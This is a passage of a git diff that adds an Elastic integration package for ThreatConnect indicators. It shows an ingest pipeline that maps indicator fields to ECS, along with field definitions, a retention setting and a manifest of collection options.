ctx.threat_connect.indicator.type.contains('Registry Key') + - append: + field: related.hash + tag: convert_md5_address_to_related_hash + value: '{{{threat_connect.indicator.md5}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.md5 != null + - rename: + field: json.Mutex + tag: rename_Mutex + target_field: threat_connect.indicator.mutex + ignore_missing: true + - rename: + field: json.observations + tag: rename_observations + target_field: threat_connect.indicator.observations + ignore_missing: true + - convert: + field: json.ownerId + tag: convert_ownerId_to_string + target_field: threat_connect.indicator.owner.id + type: string + ignore_missing: true + - rename: + field: json.ownerName + tag: rename_ownerName + target_field: threat_connect.indicator.owner.name + ignore_missing: true + - convert: + field: json.privateFlag + tag: convert_privateFlag_to_boolean + target_field: threat_connect.indicator.private_flag + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.rating + tag: convert_rating_to_double + target_field: threat_connect.indicator.rating + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.securityLabels.data + if: ctx.json?.securityLabels?.data != null + tag: foreach_date_securityLabels_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_securityLabels_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - script: + lang: painless + description: "Extract TLP and providers from source" + if: ctx.json?.securityLabels?.data != null && ctx.json?.securityLabels?.data instanceof List + tag: script_securityLabels_data_name + source: >- + def ecsTlps = ['WHITE','CLEAR','GREEN','AMBER','AMBER+STRICT','RED']; + def tlps = new ArrayList(); + for (def obj : ctx.json.securityLabels.data) { + if (obj.containsKey('name')) { + if (obj.get('name').contains(':')){ + def name = obj.get('name').splitOnToken(':')[1]; + if (ecsTlps.contains(name)) { + tlps.add(name) + } + } + } + } + if (tlps.size() > 0){ + if (ctx.threat.indicator.marking == null) { + ctx.threat.indicator.marking = new HashMap(); + } + ctx.threat.indicator.marking.tlp = tlps; + } + - foreach: + field: json.securityLabels.data + if: ctx.json?.securityLabels?.data != null + tag: foreach_convert_securityLables_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_securityLables_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.securityLabels.data + tag: rename_securityLabels_data + target_field: threat_connect.indicator.security_labels.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.security_labels.data + if: ctx.threat_connect?.indicator?.security_labels?.data instanceof List + tag: foreach_remove_security_labels_duplicates + processor: + remove: + field: + - _ingest._value.dateAdded + tag: remove_security_labels_duplicate_fields + ignore_missing: true + - rename: + field: json.sha1 + tag: rename_sha1 + target_field: threat_connect.indicator.sha1 + ignore_missing: true + - set: + field: threat.indicator.file.hash.sha1 + tag: set_threat_indicator_file_hash_sha1_from_indicator_sha1 + copy_from: threat_connect.indicator.sha1 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + - append: + field: related.hash + tag: convert_sha1_address_to_related_hash + value: '{{{threat_connect.indicator.sha1}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.sha1 != null + - rename: + field: json.sha256 + tag: rename_sha256 + target_field: threat_connect.indicator.sha256 + ignore_missing: true + - set: + field: threat.indicator.file.hash.sha256 + tag: set_threat_indicator_file_hash_sha256_from_indicator_sha256 + copy_from: threat_connect.indicator.sha256 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + - append: + field: related.hash + tag: convert_sha256_address_to_related_hash + value: '{{{threat_connect.indicator.sha256}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.md5 != null + - convert: + field: json.size + tag: convert_size_to_string + target_field: threat_connect.indicator.size + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.source + tag: rename_source + target_field: threat_connect.indicator.source + ignore_missing: true + - rename: + field: json.Subject + tag: rename_Subject + target_field: threat_connect.indicator.subject + ignore_missing: true + - set: + field: email.subject + tag: set_email_subject_from_indicator_subject + copy_from: threat_connect.indicator.subject + ignore_empty_value: true + - rename: + field: json.summary + tag: rename_summary + target_field: threat_connect.indicator.summary + ignore_missing: true + - set: + field: event.id + tag: set_event_id_from_indicator_summary + copy_from: threat_connect.indicator.summary + ignore_empty_value: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_convert_tags_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_tags_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_date_tags_data_lastUsed + processor: + date: + field: _ingest._value.lastUsed + tag: date_tags_data_lastUsed + target_field: _ingest._value.last_used + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastUsed + ignore_missing: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_convert_tags_data_platforms_count_to_long + processor: + convert: + field: _ingest._value.platforms.count + tag: convert_tags_data_platforms_count_to_long + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.platforms.count + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_rename_tags_data_techniqueId + processor: + rename: + field: _ingest._value.techniqueId + tag: rename_tags_data_techniqueId + target_field: _ingest._value.technique.id + ignore_missing: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_append_tags_data_techniqueId + processor: + append: + field: threat.technique.id + tag: append_tags_data_techniqueId + value: '{{{_ingest._value.technique.id}}}' + allow_duplicates: false + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_tags_data_append_os_family + processor: + foreach: + field: _ingest._value.platforms.data + ignore_missing: true + tag: foreach_platforms_data + processor: + append: + field: os.family + tag: append_tags_platforms_data + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.tags.data + tag: rename_tags_data + target_field: threat_connect.indicator.tags.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.tags.data + if: ctx.threat_connect?.indicator?.tags?.data != null + tag: foreach_remove_tags_duplicate_fields + processor: + remove: + field: + - _ingest._value.lastUsed + tag: remove_tags_duplicate_fields + ignore_missing: true + - rename: + field: json.text + tag: rename_text + target_field: threat_connect.indicator.text + ignore_missing: true + - set: + field: threat.indicator.url.original + tag: set_threat_indicator_url_original_from_indicator_text + copy_from: threat_connect.indicator.text + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('URL') + - convert: + field: json.threatAssessConfidence + tag: convert_threatAssessConfidence_to_double + target_field: threat_connect.indicator.threat_assess.confidence + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessRating + tag: convert_threatAssessRating_to_double + target_field: threat_connect.indicator.threat_assess.rating + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessScoreFalsePositive + tag: convert_threatAssessScoreFalsePositive_to_long + target_field: threat_connect.indicator.threat_assess.score.false_positive + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessScoreObserved + tag: convert_threatAssessScoreObserved_to_long + target_field: threat_connect.indicator.threat_assess.score.observed + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessScore + tag: convert_threatAssessScore_to_long + target_field: threat_connect.indicator.threat_assess.score.value + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.trackedUsers + tag: rename_trackedUsers + target_field: threat_connect.indicator.tracked_users + ignore_missing: true + - rename: + field: json.User Agent String + tag: rename_User Agent String + target_field: threat_connect.indicator.user_agent_string + ignore_missing: true + - set: + field: user_agent.original + tag: set_user_agent_original_from_indicator_user_agent_string + copy_from: threat_connect.indicator.user_agent_string + ignore_empty_value: true + - rename: + field: json.Value Name + tag: rename_Value Name + target_field: threat_connect.indicator.value.name + ignore_missing: true + - set: + field: threat.indicator.registry.value + tag: set_threat_indicator_registry_value_from_indicator_value_name + copy_from: threat_connect.indicator.value.name + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('Registry Key') + - rename: + field: json.Value Type + tag: rename_Value Type + target_field: threat_connect.indicator.value.type + ignore_missing: true + - set: + field: threat.indicator.registry.data.type + tag: set_threat_indicator_registry_data_type_from_indicator_value_type + copy_from: threat_connect.indicator.value.type + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('Registry Key') + - rename: + field: json.webLink + tag: rename_webLink + target_field: threat_connect.indicator.web_link + ignore_missing: true + - append: + field: threat.indicator.reference + tag: append_threat_indicator_reference_from_indicator_web_link + value: '{{{threat_connect.indicator.web_link}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.web_link != null + - rename: + field: json.whoIs + tag: rename_whoIs + target_field: threat_connect.indicator.who_is + ignore_missing: true + - convert: + field: json.whoisActive + tag: convert_whoisActive_to_boolean + target_field: threat_connect.indicator.whois_active + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml b/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml new file mode 100644 index 00000000000..0ea1baf7e18 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml @@ -0,0 +1,24 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: ti_threatconnect +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: ti_threatconnect.indicator +- name: '@timestamp' + type: date + description: Event timestamp. +- name: threat.feed.name + type: constant_keyword + description: Display friendly feed name. + value: ThreatConnect Indicator diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml b/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml b/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml new file mode 100644 index 00000000000..57710389d51 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml @@ -0,0 +1,655 @@ +- name: threat_connect + type: group + fields: + - name: indicator + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: associated_artifacts + type: flattened + description: A list of Artifacts associated to the Indicator. + - name: associated_cases + type: flattened + description: A list of Cases associated to the Indicator. + - name: associated_groups + type: group + fields: + - name: data + type: group + fields: + - name: assignments + type: group + fields: + - name: data + type: group + fields: + - name: type + type: keyword + description: Valid values for the type of assignment are Assigned and Escalate. + - name: user + type: group + fields: + - name: id + type: keyword + description: Unique identifier of users assigned to the Task or to whom the Task will be escalated. + - name: body + type: keyword + description: The Emails body. + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of user. + - name: id + type: keyword + description: Unique Identifier of the user who created the group. + - name: last_name + type: keyword + description: Last name of user. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of user. + - name: date_added + type: date + description: Date and time group was added. + - name: document + type: group + fields: + - name: date_added + type: date + description: Date and time when the document was added. + - name: type + type: keyword + description: The type of document. + - name: down_vote_count + type: keyword + description: Downvote Intel Rating. + - name: due_date + type: date + description: The date and time when the Task is due. + - name: email_date + type: date + description: The date associated with an email. + - name: escalation_date + type: date + description: The date and time when the Task should be escalated. + - name: event_date + type: date + description: The date and time when the Event took place. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Group was created externally. + - name: expires + type: date + description: The date and time when the Group expires externally. + - name: last_modified + type: date + description: The date and time when the Group was last modified externally. + - name: file + type: group + fields: + - name: name + type: keyword + description: The file name of the Document. + - name: size + type: keyword + description: The File size of the document. + - name: text + type: keyword + description: The file text of the Signature. + - name: type + type: keyword + description: The file type of the SignaturePossible values are Bro, ClamAV, CybOX, Iris Search Hash, KQL, OpenIOC, Regex, SPL, Sigma, Snort, Suricata, TQL Query and YARA. + - name: first_seen + type: date + description: The date and time when the Group was first seen. + - name: from + type: keyword + description: The Emails subject. + - name: generated_report + type: boolean + description: Indicates whether the report is generated. + - name: header + type: keyword + description: The Emails header. + - name: id + type: keyword + description: Unique Identifier of Group. + - name: last_modified + type: date + description: Date and time when the document was last updated. + - name: last_seen + type: date + description: The date and time when the Group was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the group's details in the ThreatConnect web application. + - name: malware + type: boolean + description: Indicates whether the Document is malware. + - name: name + type: keyword + description: The Groups name. + - name: owner + type: group + fields: + - name: id + type: keyword + description: The ID of the owner to which the Group belongs. + - name: name + type: keyword + description: The name of the owner to which the Group belongs. + - name: password + type: keyword + description: The password associated with the Document. + - name: publish_date + type: date + description: The date and time when the Report was published. + - name: reminder_date + type: date + description: The date and time when a reminder about the Task will be sent. + - name: score_breakdown + type: keyword + description: A breakdown or explanation of the score, providing additional information about how the score was determined. + - name: score_includes_body + type: boolean + description: Indicates whether the score includes information from the email body. + - name: status + type: keyword + description: The status of the Group type. + - name: subject + type: keyword + description: The Emails From field. + - name: to + type: keyword + description: The receiver email address. + - name: type + type: keyword + description: The type of Group being created. Possiblevalues :Adversary, AttackPattern, Campaign, CourseofAction, Document, Email, Event, Incident, IntrusionSet, Malware, Report, Signature, Tactic, Task, Threat, Tool and Vulnerability. + - name: up_vote + type: boolean + description: Use this field to update the Groups Intel Rating. + - name: up_vote_count + type: keyword + description: Upvote Intel Rating. + - name: web_link + type: keyword + description: Link to the group's details in the ThreatConnect web application. + - name: xid + type: keyword + description: The Groups XID. + - name: associated_indicators + type: group + fields: + - name: data + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: last_modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. + - name: id + type: keyword + description: Unique identifier for the indicator. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. + - name: mutex + type: keyword + description: The synchronization primitive used to identify malware files that is associated with the Mutex. + - name: owner + type: group + fields: + - name: id + type: keyword + description: Identifier for the owner of the indicator. + - name: name + type: keyword + description: Name of the organization that owns the indicator. + - name: private_flag + type: boolean + description: Indicates whether the indicator is marked as private. + - name: rating + type: double + description: The Indicators Threat Rating. + - name: sha1 + type: keyword + description: The SHA1 hash associated with the File Indicator. + - name: sha256 + type: keyword + description: The SHA256 hash associated with the File Indicator. + - name: size + type: keyword + description: The size of the file associated with the File Indicator. + - name: subject + type: keyword + description: The subject line of the email associated with the Email Subject Indicator. + - name: summary + type: keyword + description: Summary or description of the indicator. + - name: text + type: keyword + description: The URL associated with the URL Indicator. + - name: type + type: keyword + description: Type of the indicator. + - name: user_agent_string + type: keyword + description: The characteristic identification string associated with the User Agent Indicator. + - name: value + type: group + fields: + - name: name + type: keyword + description: The registry value associated with the Registry Key Indicator. + - name: type + type: keyword + description: "Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ." + - name: web_link + type: keyword + description: Link to the indicator's details in the ThreatConnect web application. + - name: whois_active + type: boolean + description: Indicates whether the Whois feature is active for the Host Indicator. + - name: attributes + type: group + fields: + - name: data + type: group + fields: + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of the user who created the victim attribute. + - name: id + type: keyword + description: Unique Identifier of the user who created the attribute. + - name: last_name + type: keyword + description: Lastname of the user who created the victim attribute. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of the user who created the victim attribute. + - name: date_added + type: date + description: Date and time when the attribute was added. + - name: default + type: boolean + description: Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only). + - name: id + type: keyword + description: Unique Identifier of attribute. + - name: last_modified + type: date + description: Date and time when attribute was modified. + - name: pinned + type: boolean + description: Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added. + - name: source + type: keyword + description: The Attributes source. + - name: type + type: keyword + description: The Attributes type. + - name: value + type: keyword + description: The Attributes value. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: custom_associations + type: flattened + description: Includes indicators with custom associations to the indicator. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: deleted_at + type: date + description: Date when the IOC was expired/deleted. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: dns_resolution + type: flattened + description: Includes DNS resolution data related to the Host indicators. + - name: enrichment + type: flattened + description: Includes Enrichment data related to the indicator. + - name: expiration_duration + type: keyword + description: Duration when the IOC will expire. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: external_last + type: group + fields: + - name: modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: false_positive_reported_by_user + type: boolean + description: Indicates whether false positive is reported by user. + - name: false_positives + type: long + description: Count of false positives. + - name: file_actions + type: flattened + description: A list of File Actions associated with the File Indicator. + - name: file_occurrences + type: flattened + description: A list of File Occurrences associated with the File Indicator. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: generic_custom_indicator_values + type: flattened + description: 'Includes the fields over-writing the custom field names: value1, value2, and value3.' + - name: geo_location + type: flattened + description: Includes GEO location information related to the Host and IP indicators. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. + - name: id + type: keyword + description: Unique identifier for the indicator. + - name: investigation_links + type: flattened + description: Includes investigation links related to the indicator type. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_false_positive + type: date + description: Date and time of last false positive. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. + - name: mutex + type: keyword + description: The synchronization primitive used to identify malware files that is associated with the Mutex. + - name: observations + type: flattened + description: Includes the Observations fields. + - name: owner + type: group + fields: + - name: id + type: keyword + description: Identifier for the owner of the indicator. + - name: name + type: keyword + description: Name of the organization that owns the indicator. + - name: private_flag + type: boolean + description: Indicates whether the indicator is marked as private. + - name: rating + type: double + description: The Indicators Threat Rating. + - name: security_labels + type: group + fields: + - name: data + type: group + fields: + - name: color + type: keyword + description: Color associated with the security label. + - name: date_added + type: date + description: ' The date and time when the security label was added.' + - name: description + type: keyword + description: Description of the security label. + - name: id + type: keyword + description: Unique identifier for the security label. + - name: name + type: keyword + description: Actual name or label of the security classification. + - name: owner + type: keyword + description: The entity or system that owns or manages the security label. + - name: source + type: keyword + description: The source of the security label. + - name: sha1 + type: keyword + description: The SHA1 hash associated with the File Indicator. + - name: sha256 + type: keyword + description: The SHA256 hash associated with the File Indicator. + - name: size + type: keyword + description: The size of the file associated with the File Indicator. + - name: source + type: keyword + description: The Indicators source. + - name: subject + type: keyword + description: The subject line of the email associated with the Email Subject Indicator. + - name: summary + type: keyword + description: Summary or description of the indicator. + - name: tags + type: group + fields: + - name: data + type: group + fields: + - name: description + type: keyword + description: The Tags description. + - name: id + type: keyword + description: Unique Identifier of tag. + - name: last_used + type: date + description: Date and time when tag was last used. + - name: name + type: keyword + description: Name of tag. + - name: owner + type: keyword + description: The Organization, Community, or Source to which the Tag belongs. + - name: platforms + type: group + fields: + - name: count + type: long + description: Count of platforms. + - name: data + type: keyword + description: Platform on which tag is added. + - name: technique + type: group + fields: + - name: id + type: keyword + description: Unique Identifier of tag technique. + - name: text + type: keyword + description: The URL associated with the URL Indicator. + - name: threat_assess + type: group + fields: + - name: confidence + type: double + description: The confidence level associated with the threat assessment. + - name: rating + type: double + description: A numerical rating indicating the threat assessment level. + - name: score + type: group + fields: + - name: false_positive + type: long + description: The count of false positives associated with the threat assessment score. + - name: observed + type: long + description: The observed value associated with the threat assessment score. + - name: value + type: long + description: The overall score assigned to the threat, indicating its severity or risk. + - name: tracked_users + type: flattened + description: Includes Observations and False Positive stats of tracked users. + - name: type + type: keyword + description: Type of the indicator (e.g., File, IP address). + - name: user_agent_string + type: keyword + description: The characteristic identification string associated with the User Agent Indicator. + - name: value + type: group + fields: + - name: name + type: keyword + description: The registry value associated with the Registry Key Indicator. + - name: type + type: keyword + description: "Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ." + - name: web_link + type: keyword + description: Link to the indicator's details in the ThreatConnect web application. + - name: who_is + type: flattened + description: Includes WhoIs information related to the Host indicators. + - name: whois_active + type: boolean + description: Indicates whether the Whois feature is active for the Host Indicator. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml b/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" diff --git a/packages/ti_threatconnect/data_stream/indicator/manifest.yml b/packages/ti_threatconnect/data_stream/indicator/manifest.yml new file mode 100644 index 00000000000..349bab0f8c3 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/manifest.yml @@ -0,0 +1,89 @@ +title: Collect Indicator logs from ThreatConnect. +type: logs +ilm_policy: logs-ti_threatconnect.indicator-default_policy +streams: + - input: cel + title: Indicator logs + description: Collect Indicator logs from ThreatConnect. + template_path: cel.yml.hbs + vars: + - name: tql + type: text + title: TQL + description: Filter results based on query written in [TQL](https://knowledge.threatconnect.com/docs/threatconnect-query-language-tql). + multi: false + required: false + show_user: true + - name: initial_interval + type: text + title: Initial Interval + description: How far back to pull Indicators and the groups associated with those indicators from ThreatConnect. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 168h + - name: ioc_expiration_duration + type: text + title: IOC Expiration Duration + multi: false + required: true + show_user: true + default: "90d" + description: >- + Enforces all IOCs to expire after this duration. This setting is required to avoid "orphaned" IOCs that never expire. Specify [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) using only days, hours, or minutes (e.g., 10d), avoiding mixed time units. + - name: interval + type: text + title: Interval + description: Duration between requests to the ThreatConnect API. Supported units for this parameter are h/m/s. + default: 24h + multi: false + required: true + show_user: true + - name: batch_size + type: integer + title: Batch Size + description: Batch size for the response of the ThreatConnect API. The maximum supported batch size value is 10000. + default: 5000 + multi: false + required: true + show_user: false + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 2m + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - threatconnect-indicator + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/ti_threatconnect/data_stream/indicator/sample_event.json b/packages/ti_threatconnect/data_stream/indicator/sample_event.json new file mode 100644 index 